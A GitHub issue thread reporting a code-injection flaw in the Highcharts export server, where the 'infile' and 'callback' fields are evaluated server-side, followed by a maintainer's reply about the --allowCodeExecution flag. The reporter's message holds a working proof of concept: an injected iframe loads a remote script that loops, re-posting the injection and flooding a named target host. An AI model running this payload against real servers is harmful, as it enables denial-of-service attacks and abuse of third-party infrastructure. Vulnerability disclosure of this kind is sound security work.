### ISSUE TITLE
Security Issue: Highcharts uses vulnerable component phantomjs

### ISSUE THREAD

**Issue by hexrays4711** [highcharts/node-export-server#192]
#### Expected behaviour
Highcharts export server passes input to phantomjs workers without sanitization. Highcharts should sanitize input for dangerous javascript tags to prevent vulnerabilities in phantomjs to manifest.

#### Actual behaviour

Post request
{"infile":"document.write('<iframe src="http://site.org/script.html\"></iframe>')", "async":true}

triggers the execution of the javascript from the server side because of an eval statement in worker.js.

Sample script code for performing conncection floods or post-request floods is available.
Highcharts export server fertilizes botnet and DDOS attacks because of this behaviour.

![grafik](https://user-images.githubusercontent.com/43304676/55287739-26634b80-53ad-11e9-9bdc-d8ac11b67f9d.png)

#### Reproduction steps
 

node /usr/local/lib/node_modules/highcharts-export-server/bin/cli.js -enableServer 1

Post request:
{"infile":"document.write('<iframe src="http://site.org/script.html\"></iframe>')", "async":true}

with script.html containing
<script>

i=0;

var A="A";

for (i=0;i<18;i=i+1)
A=A+A;

do {
var xhr = new XMLHttpRequest();
xhr.open("POST", 'http://localhost:7801/', true);
xhr.setRequestHeader("Content-Type", "application/json");
xhr.send("{"infile":"document.write('<iframe src=\"http://site.org/script.html\\\"></iframe>')", "async":true}");

xhr = new XMLHttpRequest();
xhr.open("GET", 'http://site_to_dos.org:80/', true);
xhr.setRequestHeader("Content-Type", "application/json");
xhr.send(A);
xhr.close();
i=i+1;
} while (i<1000);
</script>

Product version
Latest highcharts export server (v2.0.16)

**Comment by hexrays4711** [comment]
Addendum:
The callback parameter is affected, too:
"callback":"document.write('<iframe src=\"http://site.org/script.html\"></iframe>')"

**Comment by jakubSzuminski** [comment]
As you can read about the `--allowCodeExecution` in our readme:

> Turning this on is not recommended unless running on a sandboxed server without access to the general internet, or if running well-defined exports using the CLI

We're aware of this security issue and that's why we have the `--allowCodeExecution` flag disabled on our server (https://export.highcharts.com/) as there's no way to prevent all possible injection attacks that could happen in a JavaScript callback function which has access to the entire `window`.

That's why we do not perform any code sanitization and you can enable `--allowCodeExecution` at your own risk which we do not recommend if your app is public.
